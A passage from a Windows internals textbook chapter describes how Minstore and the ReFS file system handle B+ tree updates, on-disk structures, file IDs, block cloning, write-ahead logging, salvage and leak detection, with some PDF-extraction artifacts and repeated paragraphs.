and updates the file’s metadata. The new B+ tree is then written to the disk in the free space block,
and the old table is converted as free space. If the write is tagged as a write-through, meaning that the
write must be discoverable after a crash, ReFS writes a log record for recording the write-to-new opera-
tion. (See the “ReFS write-through” section later in this chapter for further details).
Page table
When Minstore updates a bucket in the B+ tree (maybe because it needs to move a child node or even
add a row in the table), it generally needs to update the parent (or director) nodes. (More precisely,
Minstore uses different links that point to a new and an old child bucket for every node.) This is because,
as we have described earlier, every director node contains the checksum of its leaves. Furthermore, the
leaf node could have been moved or could even have been deleted. This leads to synchronization prob-
lems; for example, imagine a thread that is reading the B+ tree while a row is being deleted. Locking the
tree and writing every modification on the physical medium would be prohibitively expensive. Minstore
needs a convenient and fast way to keep track of the information about the tree. The Minstore Page Table
(unrelated to the CPU’s page table), is an in-memory hash table private to each Minstore’s root table—
usually the directory and file table—which keeps track of which bucket is dirty, freed, or deleted. This
table will never be stored on the disk. In Minstore, the terms bucket and page are used interchangeably;
a page usually resides in memory, whereas a bucket is stored on disk, but they express exactly the same
high-level concept. Trees and tables also are used interchangeably, which explains why the page table is
called as it is. The rows of a page table are composed of the LCN of the target bucket, as a Key, and a data
structure that keeps track of the page states and assists the synchronization of the B+ tree as a value.
When a page is first read or created, a new entry will be inserted into the hash table that represents
the page table. An entry into the page table can be deleted only if all the following conditions are met:
I
There are no active transactions accessing the page.
I
The page is clean and has no modifications.
I
The page is not a copy-on-write new page of a previous one.
Thanks to these rules, clean pages usually come into the page table and are deleted from it repeat-
edly, whereas a page that is dirty would stay in the page table until the B+ tree is updated and finally
written to disk. The process of writing the tree to stable media depends heavily upon the state in the
page table at any given time. As you can see from Figure 11-82, the page table is used by Minstore as
an in-memory cache, producing an implicit state machine that describes each state of a page.
746
CHAPTER 11
Caching and file systems
COPIED
DIRTY
FREED
CLEAN
(New)
Page has been
modified
Can exit the
page table ONLY
in clean state
Page has been
copied (on-write)
Page space on-disk
freed
B+ tree
written on disk
FIGURE 11-82 The diagram shows the states of a dirty page (bucket) in the page table. A new page is produced due
to copy-on-write of an old page or if the B+ tree is growing and needs more space for storing the bucket.
Minstore I/O
In Minstore, reads and writes to the B+ tree in the final physical medium are performed in a different
way: tree reads usually happen in portions, meaning that the read operation might only include some
leaf buckets, for example, and occurs as part of transactional access or as a preemptive prefetch action.
After a bucket is read into the cache (see the “Cache manager” section earlier in this chapter), Minstore
still can’t interpret its data because the bucket checksum needs to be verified. The expected checksum
is stored in the parent node: when the ReFS driver (which resides above Minstore) intercepts the read
data, it knows that the node still needs to be validated: the parent node is already in the cache (the tree
has been already navigated for reaching the child) and contains the checksum of the child. Minstore
has all the needed information for verifying that the bucket contains valid data. Note that there could
be pages in the page table that have been never accessed. This is because their checksum still needs
to be validated.
Minstore performs tree updates by writing the entire B+ tree as a single transaction. The tree update
process writes dirty pages of the B+ tree to the physical disk. There are multiple reasons behind a tree
update—an application explicitly flushing its changes, the system running in low memory or similar
conditions, the cache manager flushing cached data to disk, and so on. It’s worth mentioning that
Minstore usually writes the new updated trees lazily with the lazy writer thread. As seen in the previous
section, there are several triggers to kick in the lazy writer (for example, when the number of the dirty
pages reaches a certain threshold).
Minstore is unaware of the actual reason behind the tree update request. The first thing that Minstore
does is make sure that no other transactions are modifying the tree (using complex synchronization
primitives). After initial synchronization, it starts to write dirty pages and with old deleted pages. In a
CHAPTER 11
Caching and file systems
747
write-to-new implementation, a new page represents a bucket that has been modified and its content
replaced; a freed page is an old page that needs to be unlinked from the parent. If a transaction wants to
modify a leaf node, it copies (in memory) the root bucket and the leaf page; Minstore then creates the
corresponding page table entries in the page table without modifying any link.
The tree update algorithm enumerates each page in the page table. However, the page table has
no concept of which level in the B+ tree the page resides, so the algorithm checks even the B+ tree by
starting from the more external node (usually the leaf), up to the root nodes. For each page, the algo-
rithm performs the following steps:
1.
Checks the state of the page. If it’s a freed page, it skips the page. If it’s a dirty page, it updates
its parent pointer and checksum and puts the page in an internal list of pages to write.
2.
Discards the old page.
When the algorithm reaches the root node, it updates its parent pointer and checksum directly in
the object table and finally puts also the root bucket in the list of pages to write. Minstore is now able to
write the new tree in the free space of the underlying volume, preserving the old tree in its original loca-
tion. The old tree is only marked as freed but is still present in the physical medium. This is an important
characteristic that summarizes the write-to-new strategy and allows the ReFS file system (which resides
above Minstore) to support advanced online recovery features. Figure 11-83 shows an example of the tree
update process for a B+ table that contains two new leaf pages (A’ and B’). In the figure, pages located in
the page table are represented in a lighter shade, whereas the old pages are shown in a darker shade.
C
B'
A'
WriteList
Checksum(A') Checksum(B') Checksum(C')
Checksum(A') Checksum(B') Checksum(C)
Object Table
FIGURE 11-83 Minstore tree update process.
748
CHAPTER 11
Caching and file systems
Maintaining exclusive access to the tree while performing the tree update can represent a perfor-
mance issue; no one else can read or write from a B+ tree that has been exclusively locked. In the latest
versions of Windows 10, B+ trees in Minstore became generational—a generation number is attached
to each B+ tree. This means that a page in the tree can be dirty with regard to a specific generation. If
a page is originally dirty for only a specific tree generation, it can be directly updated, with no need to
copy-on-write because the final tree has still not been written to disk.
In the new model, the tree update process is usually split in two phases:
I
Failable phase: Minstore acquires the exclusive lock on the tree, increments the tree’s genera-
tion number, calculates and allocates the needed memory for the tree update, and finally drops
the lock to shared.
I
Nonfailable phase: This phase is executed with a shared lock (meaning that other I/O can read
from the tree), Minstore updates the links of the director nodes and all the tree’s checksums,
and finally writes the final tree to the underlying disk. If another transaction wants to modify the
tree while it’s being written to disk, it detects that the tree’s generation number is higher, so it
copy-on-writes the tree again.
With the new schema, Minstore holds the exclusive lock only in the failable phase. This means that
tree updates can run in parallel with other Minstore transactions, significantly improving the overall
performance.
ReFS architecture
As already introduced in previous paragraphs, ReFS (the Resilient file system) is a hybrid of the NTFS
implementation and Minstore, where every file and directory is a B+ tree configured by a particular
schema. The file system volume is a flat namespace of directories. As discussed previously, NTFS is
composed of different components:
I
Core FS support: Describes the interface between the file system and other system compo-
nents, like the cache manager and the I/O subsystem, and exposes the concept of file create,
open, read, write, close, and so on.
I
High-level FS feature support: Describes the high-level features of a modern file system,
like file compression, file links, quota tracking, reparse points, file encryption, recovery support,
and so on.
I
On-disk dependent components and data structures MFT and file records, clusters, index
package, resident and nonresident attributes, and so on (see the “The NT file system (NTFS)”
section earlier in this chapter for more details).
ReFS keeps the first two parts largely unchanged and replaces the rest of the on-disk dependent
components with Minstore, as shown in Figure 11-84.
CHAPTER 11
Caching and file systems
749
Index package
Interface support (object lifetime, rename, etc.)
System Interface (IRP_MJ_XYZ…)
File record attribute package
Bitmap package
MFT package
Log manager
Change journal
Quota, etc.
Format-dependent
FIGURE 11-84 ReFS architecture’s scheme.
In the “NTFS driver” section of this chapter, we introduced the entities that link a file handle to the
file system’s on-disk structure. In the ReFS file system driver, those data structures (the stream control
block, which represents the NTFS attribute that the caller is trying to read, and the file control block,
which contains a pointer to the file record in the disk’s MFT) are still valid, but have a slightly different
meaning in respect to their underlying durable storage. The changes made to these objects go through
Minstore instead of being directly translated in changes to the on-disk MFT. As shown in Figure 11-85,
in ReFS:
I
A file control block (FCB) represents a single file or directory and, as such, contains a pointer to
the Minstore B+ tree, a reference to the parent directory’s stream control block and key (the
directory name). The FCB is pointed to by the file object, through the FsContext2 field.
I
A stream control block (SCB) represents an opened stream of the file object. The data struc-
ture used in ReFS is a simplified version of the NTFS one. When the SCB represents directories,
though, the SCB has a link to the directory’s index, which is located in the B+ tree that repre-
sents the directory. The SCB is pointed to by the file object, through the FsContext field.
I
A volume control block (VCB) represents a currently mounted volume, formatted by ReFS.
When a properly formatted volume has been identified by the ReFS driver, a VCB data structure
is created, attached into the volume device object extension, and linked into a list located in a
global data structure that the ReFS file system driver allocates at its initialization time. The VCB
contains a table of all the directory FCBs that the volume has currently opened, indexed by their
reference ID.
750
CHAPTER 11
Caching and file systems
File object
FCB
Index SCB
Embedded
B+ tree
Index B+
tree
File object
FCB
Data SCB
Embedded
B+ tree
Directory
File
FIGURE 11-85 ReFS files and directories in-memory data structures.
In ReFS, every open file has a single FCB in memory that can be pointed to by different SCBs (de-
pending on the number of streams opened). Unlike NTFS, where the FCB needs only to know the MFT
entry of the file to correctly change an attribute, the FCB in ReFS needs to point to the B+ tree that
represents the file record. Each row in the file’s B+ tree represents an attribute of the file, like the ID, full
name, extents table, and so on. The key of each row is the attribute code (an integer value).
File records are entries in the directory in which files reside. The root node of the B+ tree that repre-
sents a file is embedded into the directory entry’s value data and never appears in the object table. The
file data streams, which are represented by the extents table, are embedded B+ trees in the file record.
The extents table is indexed by range. This means that every row in the extent table has a VCN range
used as the row’s key, and the LCN of the file’s extent used as the row’s value. In ReFS, the extents table
could become very large (it is indeed a regular B+ tree). This allows ReFS to support huge files, bypass-
ing the limitations of NTFS.
Figure 11-86 shows the object table, files, directories, and the file extent table, which in ReFS are all
represented through B+ trees and provide the file system namespace.
Object ID
Object Table
Disk
Location
Object ID
Disk
Location
Object ID
Disk
Location
Object ID
Disk
Location
…
File Name
Directory
File Record Index
File Name
File Record Index
File Name
File Record Index
File Name
File Record Index
10
File Record
Std Info
30
File Name
80
Extents Index
…
…
This root is embedded in parent table’s row
…and so is this one
0-100
File Extents
@ 5004
101-200
@ 9550
300-304
@ 1000
FIGURE 11-86 Files and directories in ReFS.
CHAPTER 11
Caching and file systems
751
Directories are Minstore B+ trees that are responsible for the single, flat namespace. A ReFS
directory can contain:
I
Files
I
Links to directories
I
Links to other files (file IDs)
Rows in the directory B+ tree are composed of a key type value pair, where the key is the entry’s
name and the value depends on the type of directory entry. With the goal of supporting queries and
other high-level semantics, Minstore also stores some internal data in invisible directory rows. These kinds
of rows have have their key starting with a Unicode zero character. Another row that is worth mentioning
is the directory’s file row. Every directory has a record, and in ReFS that file record is stored as a file row in
the self-same directory, using a well-known zero key. This has some effect on the in-memory data struc-
tures that ReFS maintains for directories. In NTFS, a directory is really a property of a file record (through
the Index Root and Index Allocation attributes); in ReFS, a directory is a file record stored in the directory
itself (called directory index record). Therefore, whenever ReFS manipulates or inspects files in a directory,
it must ensure that the directory index is open and resident in memory. To be able to update the direc-
tory, ReFS stores a pointer to the directory’s index record in the opened stream control block.
The described configuration of the ReFS B+ trees does not solve an important problem. Every time
the system wants to enumerate the files in a directory, it needs to open and parse the B+ tree of each
file. This means that a lot of I/O requests to different locations in the underlying medium are needed.
If the medium is a rotational disk, the performance would be rather bad.
To solve the issue, ReFS stores a STANDARD_INFORMATION data structure in the root node of
the file’s embedded table (instead of storing it in a row of the child file’s B+ table). The STANDARD
_INFORMATION data includes all the information needed for the enumeration of a file (like the file’s
access time, size, attributes, security descriptor ID, the update sequence number, and so on). A file’s
embedded root node is stored in a leaf bucket of the parent directory’s B+ tree. By having the data
structure located in the file’s embedded root node, when the system enumerates files in a directory,
it only needs to parse entries in the directory B+ tree without accessing any B+ tables describing indi-
vidual files. The B+ tree that represents the directory is already in the page table, so the enumeration
is quite fast.
ReFS on-disk structure
This section describes the on-disk structure of a ReFS volume, similar to the previous NTFS section. The
section focuses on the differences between NTFS and ReFS and will not cover the concepts already
described in the previous section.
The Boot sector of a ReFS volume consists of a small data structure that, similar to NTFS, contains
basic volume information (serial number, cluster size, and so on), the file system identifier (the ReFS
OEM string and version), and the ReFS container size (more details are covered in the “Shingled mag-
netic recording (SMR) volumes” section later in the chapter). The most important data structure in the
volume is the volume super block. It contains the offset of the latest volume checkpoint records and
752
CHAPTER 11
Caching and file systems
is replicated in three different clusters. ReFS, to be able to mount a volume, reads one of the volume
checkpoints, verifies and parses it (the checkpoint record includes a checksum), and finally gets the
offset of each global table.
The volume mounting process opens the object table and gets the needed information for reading
the root directory, which contains all of the directory trees that compose the volume namespace. The
object table, together with the container table, is indeed one of the most critical data structures that is
the starting point for all volume metadata. The container table exposes the virtualization namespace,
so without it, ReFS would not able to correctly identify the final location of any cluster. Minstore op-
tionally allows clients to store information within its object table rows. The object table row values, as
shown in Figure 11-87, have two distinct parts: a portion owned by Minstore and a portion owned by
ReFS. ReFS stores parent information as well as a high watermark for USN numbers within a directory
(see the section “Security and change journal” later in this chapter for more details).
ObjectId
key
value
Last USN #
Parent object ID
Root location
Root checksum
Last written log #
FIGURE 11-87 The object table entry composed of a ReFS part (bottom rectangle) and Minstore part (top rectangle).
Object IDs
Another problem that ReFS needs to solve regards file IDs. For various reasons—primarily for tracking
and storing metadata about files in an efficient way without tying information to the namespace—
ReFS needs to support applications that open a file through their file ID (using the OpenFileById API, for
example). NTFS accomplishes this through the Extend\ObjId file (using the 0 index root attribute;
see the previous NTFS section for more details). In ReFS, assigning an ID to every directory is trivial;
indeed, Minstore stores the object ID of a directory in the object table. The problem arises when the
system needs to be able to assign an ID to a file; ReFS doesn’t have a central file ID repository like NTFS
does. To properly find a file ID located in a directory tree, ReFS splits the file ID space into two portions:
the directory and the file. The directory ID consumes the directory portion and is indexed into the key
of an object table’s row. The file portion is assigned out of the directory’s internal file ID space. An ID
that represents a directory usually has a zero in its file portion, but all files inside the directory share
the same directory portion. ReFS supports the concept of file IDs by adding a separate row (composed
of a FileId FileName pair) in the directory’s B+ tree, which maps the file ID to the file name within
the directory.
CHAPTER 11
Caching and file systems
753
When the system is required to open a file located in a ReFS volume using its file ID, ReFS satisfies
the request by:
1.
Opening the directory specified by the directory portion
2.
Querying the FileId row in the directory B+ tree that has the key corresponding to the
file portion
3.
Querying the directory B+ tree for the file name found in the last lookup.
Careful readers may have noted that the algorithm does not explain what happens when a file is re-
named or moved. The ID of a renamed file should be the same as its previous location, even if the ID of
the new directory is different in the directory portion of the file ID. ReFS solves the problem by replac-
ing the original file ID entry, located in the old directory B+ tree, with a new “tombstone” entry, which,
instead of specifying the target file name in its value, contains the new assigned ID of the renamed file
(with both the directory and the file portion changed). Another new File ID entry is also allocated in the
new directory B+ tree, which allows assigning the new local file ID to the renamed file. If the file is then
moved to yet another directory, the second directory has its ID entry deleted because it’s no longer
needed; one tombstone, at most, is present for any given file.
Security and change journal
The mechanics of supporting Windows object security in the file system lie mostly in the higher com-
ponents that are implemented by the portions of the file system remained unchanged since NTFS. The
underlying on-disk implementation has been changed to support the same set of semantics. In ReFS,
object security descriptors are stored in the volume’s global security directory B+ table. A hash is com-
puted for every security descriptor in the table (using a proprietary algorithm, which operates only on
self-relative security descriptors), and an ID is assigned to each.
When the system attaches a new security descriptor to a file, the ReFS driver calculates the secu-
rity descriptor’s hash and checks whether it’s already present in the global security table. If the hash is
present in the table, ReFS resolves its ID and stores it in the STANDARD_INFORMATION data structure
located in the embedded root node of the file’s B+ tree. In case the hash does not already exist in the
global security table, ReFS executes a similar procedure but first adds the new security descriptor in the
global B+ tree and generates its new ID.
The rows of the global security table are of the format hash ID security descriptor ref. count,
where the hash and the ID are as described earlier, the security descriptor is the raw byte payload of
the security descriptor itself, and ref. count is a rough estimate of how many objects on the volume are
using the security descriptor.
As described in the previous section, NTFS implements a change journal feature, which provides ap-
plications and services with the ability to query past changes to files within a volume. ReFS implements
an NTFS-compatible change journal implemented in a slightly different way. The ReFS journal stores
change entries in the change journal file located in another volume’s global Minstore B+ tree, the
metadata directory table. ReFS opens and parses the volume’s change journal file only once the vol-
ume is mounted. The maximum size of the journal is stored in the USN_MAX attribute of the journal
754
CHAPTER 11
Caching and file systems
file. In ReFS, each file and directory contains its last USN (update sequence number) in the STANDARD_
INFORMATION data structure stored in the embedded root node of the parent directory. Through the
journal file and the USN number of each file and directory, ReFS can provide the three FSCTL used for
reading and enumerate the volume journal file:
I
FSCTL_READ_USN_JOURNAL: Reads the USN journal directly. Callers specify the journal ID
they’re reading and the number of the USN record they expect to read.
I
FSCTL_READ_FILE_USN_DATA: Retrieves the USN change journal information for the specified
file or directory.
I
FSCTL_ENUM_USN_DATA: Scans all the file records and enumerates only those that have last
updated the USN journal with a USN record whose USN is within the range specified by the
caller. ReFS can satisfy the query by scanning the object table, then scanning each directory
referred to by the object table, and returning the files in those directories that fall within the
timeline specified. This is slow because each directory needs to be opened, examined, and so
on. (Directories’ B+ trees can be spread across the disk.) The way ReFS optimizes this is that it
stores the highest USN of all files in a directory in that directory’s object table entry. This way,
ReFS can satisfy this query by visiting only directories it knows are within the range specified.
ReFS advanced features
In this section, we describe the advanced features of ReFS, which explain why the ReFS file system is a
better fit for large server systems like the ones used in the infrastructure that provides the Azure cloud.
File’s block cloning (snapshot support) and sparse VDL
Traditionally, storage systems implement snapshot and clone functionality at the volume level (see
dynamic volumes, for example). In modern datacenters, when hundreds of virtual machines run and
are stored on a unique volume, such techniques are no longer able to scale. One of the original goals of
the ReFS design was to support file-level snapshots and scalable cloning support (a VM typically maps
to one or a few files in the underlying host storage), which meant that ReFS needed to provide a fast
method to clone an entire file or even only chunks of it. Cloning a range of blocks from one file into a
range of another file allows not only file-level snapshots but also finer-grained cloning for applications
that need to shuffle blocks within one or more files. VHD diff-disk merge is one example.
ReFS exposes the new FSCTL_DUPLICATE_EXTENTS_TO_FILE to duplicate a range of blocks from
one file into another range of the same file or to a different file. Subsequent to the clone operation,
writes into cloned ranges of either file will proceed in a write-to-new fashion, preserving the cloned
block. When there is only one remaining reference, the block can be written in place. The source and
target file handle, and all the details from which the block should be cloned, which blocks to clone from
the source, and the target range are provided as parameters.
CHAPTER 11
Caching and file systems
755
As already seen in the previous section, ReFS indexes the LCNs that make up the file’s data stream
into the extent index table, an embedded B+ tree located in a row of the file record. To support block
cloning, Minstore uses a new global index B+ tree (called the block count reference table) that tracks the
reference counts of every extent of blocks that are currently cloned. The index starts out empty. The
first successful clone operation adds one or more rows to the table, indicating that the blocks now have
a reference count of two. If one of the views of those blocks were to be deleted, the rows would be
removed. This index is consulted in write operations to determine if write-to-new is required or if write-
in-place can proceed. It’s also consulted before marking free blocks in the allocator. When freeing
clusters that belong to a file, the reference counts of the cluster-range is decremented. If the reference
count in the table reaches zero, the space is actually marked as freed.
Figure 11-88 shows an example of file cloning. After cloning an entire file (File 1 and File 2 in the pic-
ture), both files have identical extent tables, and the Minstore block count reference table shows two
references to both volume extents.
1
2
3
4
5
6
7
8
1
2
3
4
5
6
7
8
File 1
a
b
x
y
file
volume
[1-4]
[a-b]
[5-8]
[x-y]
1
2
3
4
5
6
7
8
File 2
file
volume
[1-4]
[a-b]
[5-8]
[x-y]
volextent
refcnt
[a-b]
2
[x-y]
2
FIGURE 11-88 Cloning an ReFS file.
Minstore automatically merges rows in the block reference count table whenever possible with
the intention of reducing the size of the table. In Windows Server 2016, HyperV makes use of the
new cloning FSCTL. As a result, the duplication of a VM, and the merging of its multiple snapshots,
is extremely fast.
ReFS supports the concept of a file Valid Data Length (VDL), in a similar way to NTFS. Using the
ZeroRangeInStream file data stream, ReFS keeps track of the valid or invalid state for each allocated
file’s data block. All the new allocations requested to the file are in an invalid state; the first write to the
file makes the allocation valid. ReFS returns zeroed content to read requests from invalid file ranges.
The technique is similar to the DAL, which we explained earlier in this chapter. Applications can logically
zero a portion of file without actually writing any data using the FSCTL_SET_ZERO_DATA file system
control code (the feature is used by HyperV to create fixed-size VHDs very quickly).
756
CHAPTER 11
Caching and file systems
EXPERIMENT: Witnessing ReFS snapshot support through HyperV
In this experiment, you’re going to use HyperV for testing the volume snapshot support of ReFS.
Using the HyperV manager, you need to create a virtual machine and install any operating
system on it. At the first boot, take a checkpoint on the VM by right-clicking the virtual machine
name and selecting the Checkpoint menu item. Then, install some applications on the virtual
machine (the example below shows a Windows Server 2012 machine with Office installed) and
take another checkpoint.
EXPERIMENT: Witnessing ReFS snapshot support through HyperV
In this experiment, you’re going to use HyperV for testing the volume snapshot support of ReFS.
Using the HyperV manager, you need to create a virtual machine and install any operating
system on it. At the first boot, take a checkpoint on the VM by right-clicking the virtual machine
name and selecting the Checkpoint menu item. Then, install some applications on the virtual
machine (the example below shows a Windows Server 2012 machine with Office installed) and
take another checkpoint.
CHAPTER 11
Caching and file systems
757
If you turn off the virtual machine and, using File Explorer, locate where the virtual hard disk
file resides, you will find the virtual hard disk and multiple other files that represent the differen-
tial content between the current checkpoint and the previous one.
If you open the HyperV Manager again and delete the entire checkpoint tree (by right-
clicking the first root checkpoint and selecting the Delete Checkpoint Subtree menu item), you
will find that the entire merge process takes only a few seconds. This is explained by the fact that
HyperV uses the block-cloning support of ReFS, through the FSCTL_DUPLICATE_EXTENTS_TO_FILE
I/O control code, to properly merge the checkpoints’ content into the base virtual hard disk file.
As explained in the previous paragraphs, block cloning doesn’t actually move any data. If you
repeat the same experiment with a volume formatted using an exFAT or NTFS file system, you will
find that the time needed to merge the checkpoints is much larger.
ReFS write-through
One of the goals of ReFS was to provide close to zero unavailability due to file system corruption. In
the next section, we describe all of the available online repair methods that ReFS employs to recover
from disk damage. Before describing them, it’s necessary to understand how ReFS implements write-
through when it writes the transactions to the underlying medium.
The term write-through refers to any primitive modifying operation (for example, create file, extend
file, or write block) that must not complete until the system has made a reasonable guarantee that the
results of the operation will be visible after crash recovery. Write-through performance is critical for dif-
ferent I/O scenarios, which can be broken into two kinds of file system operations: data and metadata.
If you turn off the virtual machine and, using File Explorer, locate where the virtual hard disk
file resides, you will find the virtual hard disk and multiple other files that represent the differen-
tial content between the current checkpoint and the previous one.
If you open the HyperV Manager again and delete the entire checkpoint tree (by right-
clicking the first root checkpoint and selecting the Delete Checkpoint Subtree menu item), you
will find that the entire merge process takes only a few seconds. This is explained by the fact that
HyperV uses the block-cloning support of ReFS, through the FSCTL_DUPLICATE_EXTENTS_TO_FILE
I/O control code, to properly merge the checkpoints’ content into the base virtual hard disk file.
As explained in the previous paragraphs, block cloning doesn’t actually move any data. If you
repeat the same experiment with a volume formatted using an exFAT or NTFS file system, you will
find that the time needed to merge the checkpoints is much larger.
758
CHAPTER 11
Caching and file systems
When ReFS performs an update-in-place to a file without requiring any metadata mutation (like
when the system modifies the content of an already-allocated file, without extending its length), the
write-through performance has minimal overhead. Because ReFS uses allocate-on-write for metadata,
it’s expensive to give write-through guarantees for other scenarios when metadata change. For ex-
ample, ensuring that a file has been renamed implies that the metadata blocks from the root of the file
system down to the block describing the file’s name must be written to a new location. The allocate-
on-write nature of ReFS has the property that it does not modify data in place. One implication of this
is that recovery of the system should never have to undo any operations, in contrast to NTFS.
To achieve write-through, Minstore uses write-ahead-logging (or WAL). In this scheme, shown in
Figure 11-89, the system appends records to a log that is logically infinitely long; upon recovery, the
log is read and replayed. Minstore maintains a log of logical redo transaction records for all tables
except the allocator table. Each log record describes an entire transaction, which has to be replayed at
recovery time. Each transaction record has one or more operation redo records that describe the actual
high-level operation to perform (such as insert key K / value V pair in Table X). The transaction record
allows recovery to separate transactions and is the unit of atomicity (no transactions will be partially re-
done). Logically, logging is owned by every ReFS transaction; a small log buffer contains the log record.
If the transaction is committed, the log buffer is appended to the in-memory volume log, which will
be written to disk later; otherwise, if the transaction aborts, the internal log buffer will be discarded.
Write-through transactions wait for confirmation from the log engine that the log has committed up
until that point, while non-write-through transactions are free to continue without confirmation.
Redo records
Redo records
Transaction records–tree log
Transaction
B+ tree
Transaction
Volume log
Volume
FIGURE 11-89 Scheme of Minstore’s write-ahead logging.
Furthermore, ReFS makes use of checkpoints to commit some views of the system to the underlying
disk, consequently rendering some of the previously written log records unnecessary. A transaction’s
redo log records no longer need to be redone once a checkpoint commits a view of the affected trees
to disk. This implies that the checkpoint will be responsible for determining the range of log records
that can be discarded by the log engine.
CHAPTER 11
Caching and file systems
759
ReFS recovery support
To properly keep the file system volume available at all times, ReFS uses different recovery strategies.
While NTFS has similar recovery support, the goal of ReFS is to get rid of any offline check disk utilities
(like the Chkdsk tool used by NTFS) that can take many hours to execute in huge disks and require the
operating system to be rebooted. There are mainly four ReFS recovery strategies:
I
Metadata corruption is detected via checksums and error-correcting codes. Integrity streams
validate and maintain the integrity of the file’s data using a checksum of the file’s actual content
(the checksum is stored in a row of the file’s B+ tree table), which maintains the integrity of the
file itself and not only on its file-system metadata.
I
ReFS intelligently repairs any data that is found to be corrupt, as long as another valid copy is
available. Other copies might be provided by ReFS itself (which keeps additional copies of its
own metadata for critical structures such as the object table) or through the volume redundan-
cy provided by Storage Spaces (see the “Storage Spaces” section later in this chapter).
I
ReFS implements the salvage operation, which removes corrupted data from the file system
namespace while it’s online.
I
ReFS rebuilds lost metadata via best-effort techniques.
The first and second strategies are properties of the Minstore library on which ReFS depends (more
details about the integrity streams are provided later in this section). The object table and all the global
Minstore B+ tree tables contain a checksum for each link that points to the child (or director) nodes
stored in different disk blocks. When Minstore detects that a block is not what it expects, it automati-
cally attempts repair from one of its duplicated copies (if available). If the copy is not available, Minstore
returns an error to the ReFS upper layer. ReFS responds to the error by initializing online salvage.
The term salvage refers to any fixes needed to restore as much data as possible when ReFS detects
metadata corruption in a directory B+ tree. Salvage is the evolution of the zap technique. The goal of
the zap was to bring back the volume online, even if this could lead to the loss of corrupted data. The
technique removed all the corrupted metadata from the file namespace, which then became available
after the repair.
Assume that a director node of a directory B+ tree becomes corrupted. In this case, the zap opera-
tion will fix the parent node, rewriting all the links to the child and rebalancing the tree, but the data
originally pointed by the corrupted node will be completely lost. Minstore has no idea how to recover
the entries addressed by the corrupted director node.
To solve this problem and properly restore the directory tree in the salvage process, ReFS needs
to know subdirectories’ identifiers, even when the directory table itself is not accessible (because it
has a corrupted director node, for example). Restoring part of the lost directory tree is made possible
by the introduction of a volume global table, called called the parent-child table, which provides a
directory’s information redundancy.
A key in the parent–child table represents the parent table’s ID, and the data contains a list of child
table IDs. Salvage scans this table, reads the child tables list, and re-creates a new non-corrupted B+
tree that contains all the subdirectories of the corrupted node. In addition to needing child table IDs, to
760
CHAPTER 11
Caching and file systems
completely restore the corrupted parent directory, ReFS still needs the name of the child tables, which
were originally stored in the keys of the parent B+ tree. The child table has a self-record entry with this
information (of type link to directory; see the previous section for more details). The salvage process
opens the recovered child table, reads the self-record, and reinserts the directory link into the parent
table. The strategy allows ReFS to recover all the subdirectories of a corrupted director or root node
(but still not the files). Figure 11-90 shows an example of zap and salvage operations on a corrupted
root node representing the Bar directory. With the salvage operation, ReFS is able to quickly bring the
file system back online and loses only two files in the directory.
Foo
Bar
Subdir1
A.txt
B.txt
Important file.doc
Important file.jpeg
Foo
Bar
Subdir1
A.txt
B.txt
Important file.doc
Important file.jpeg
Foo
Dir
File
Bar
Subdir1
A.txt
B.txt
Important file.doc
Important file.jpeg
Bar
Subdir1
A.txt
B.txt
Important file.doc
Important file.jpeg
A.txt
B.txt
FIGURE 11-90 Comparison between the zap and salvage operations.
The ReFS file system, after salvage completes, tries to rebuild missing information using various
best-effort techniques; for example, it can recover missing file IDs by reading the information from
other buckets (thanks to the collating rule that separates files’ IDs and tables). Furthermore, ReFS also
augments the Minstore object table with a little bit of extra information to expedite repair. Although
ReFS has these best-effort heuristics, it’s important to understand that ReFS primarily relies on the re-
dundancy provided by metadata and the storage stack in order to repair corruption without data loss.
In the very rare cases in which critical metadata is corrupted, ReFS can mount the volume in read-
only mode, but not for any corrupted tables. For example, in case that the container table and all of its
duplicates would all be corrupted, the volume wouldn’t be mountable in read-only mode. By skipping
over these tables, the file system can simply ignore the usage of such global tables (like the allocator,
for example), while still maintaining a chance for the user to recover her data.
Finally, ReFS also supports file integrity streams, where a checksum is used to guarantee the integrity
of a file’s data (and not only of the file system’s metadata). For integrity streams, ReFS stores the checksum
of each run that composes the file’s extent table (the checksum is stored in the data section of an extent
table’s row). The checksum allows ReFS to validate the integrity of the data before accessing it. Before
returning any data that has integrity streams enabled, ReFS will first calculate its checksum and compares
it to the checksum contained in the file metadata. If the checksums don’t match, then the data is corrupt.
The ReFS file system exposes the FSCTL_SCRUB_DATA control code, which is used by the scrubber
(also known as the data integrity scanner). The data integrity scanner is implemented in the Discan.dll
library and is exposed as a task scheduler task, which executes at system startup and every week. When
the scrubber sends the FSCTL to the ReFS driver, the latter starts an integrity check of the entire volume:
the ReFS driver checks the boot section, each global B+ tree, and file system’s metadata.
CHAPTER 11
Caching and file systems
761
Note The online Salvage operation, described in this section, is different from its offline
counterpart. The refsutil.exe tool, which is included in Windows, supports this operation.
The tool is used when the volume is so corrupted that it is not even mountable in read-only
mode (a rare condition). The offline Salvage operation navigates through all the volume
clusters, looking for what appears to be metadata pages, and uses best-effort techniques
to assemble them back together.
Leak detection
A cluster leak describes the situation in which a cluster is marked as allocated, but there are no refer-
ences to it. In ReFS, cluster leaks can happen for different reasons. When a corruption is detected on
a directory, online salvage is able to isolate the corruption and rebuild the tree, eventually losing only
some files that were located in the root directory itself. A system crash before the tree update algo-
rithm has written a Minstore transaction to disk can lead to a file name getting lost. In this case, the
file’s data is correctly written to disk, but ReFS has no metadata that point to it. The B+ tree table repre-
senting the file itself can still exist somewhere in the disk, but its embedded table is no longer linked in
any directory B+ tree.
The built-in refsutil.exe tool available in Windows supports the Leak Detection operation, which can
scan the entire volume and, using Minstore, navigate through the entire volume namespace. It then
builds a list of every B+ tree found in the namespace (every tree is identified by a well-known data
structure that contains an identification header), and, by querying the Minstore allocators, compares
the list of each identified tree with the list of trees that have been marked valid by the allocator. If it
finds a discrepancy, the leak detection tool notifies the ReFS file system driver, which will mark the clus-
ters allocated for the found leaked tree as freed.
Another kind of leak that can happen on the volume affects the block reference counter table, such
as when a cluster’s range located in one of its rows has a higher reference counter number than the
actual files that reference it. The lower-case tool is able to count the correct number of references and
fix the problem.
To correctly identify and fix leaks, the leak detection tool must operate on an offline volume, but,
using a similar technique to NTFS’ online scan, it can operate on a read-only snapshot of the target
volume, which is provided by the Volume Shadow Copy service.
762
CHAPTER 11
Caching and file systems
EXPERIMENT: Use Refsutil to find and fix leaks on a ReFS volume
In this experiment, you use the built-in refsutil.exe tool on a ReFS volume to find and fix cluster
leaks that could happen on a ReFS volume. By default, the tool doesn’t require a volume to be
unmounted because it operates on a read-only volume snapshot. To let the tool fix the found
